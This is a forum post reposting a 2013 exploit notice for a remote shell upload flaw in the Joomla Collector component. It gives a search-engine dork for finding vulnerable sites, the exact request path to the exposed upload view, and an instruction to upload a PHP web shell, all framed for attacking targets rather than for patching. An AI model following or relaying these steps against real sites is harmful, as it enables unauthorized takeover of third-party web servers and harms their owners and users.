Jump to content
Praetorian503

Joomla Collector Shell Upload

By Praetorian503, in Exploituri

Recommended Posts

Praetorian503 Newbie

Praetorian503

Posted
Posted

The Joomla Collector component suffers from a remote shell upload vulnerability.

# Exploit Title:Joomla com_collecter shell upload
# Author: Red Dragon_al (Alb0zZ Team)
# Home :HackForums.AL,alb0zz.in
# Date :19/01/2013

# Category:: web apps
# Google dork: [inurl:index.php?option=com_collector]
# Tested on: Windows XP

# Download: http://www.steevo.fr/en/download
# Home Page: http://www.steevo.fr/

---------------------------------------
#      ~ Expl0itation ~      #
---------------------------------------

1- Google dork: [inurl:index.php?option=com_collector]

2- add this part to the site/index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

3- it will look like this http://www.site.com/[path]//index.php?option=com_collector&view=filelist&tmpl=component&folder=&type=1

upload ur shell as : shell.php



# Greetz :R-t33n , dA3m0n , 0x0 ,The0c_No , AutoRun , Dr.Sql , Danzel , RetnOHacK , eragon, gForce , Th3_Power , AHG-CR3W, & All my friends.

#2013

Source: PacketStorm

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
Go to topic listing
×
×
  • Create New...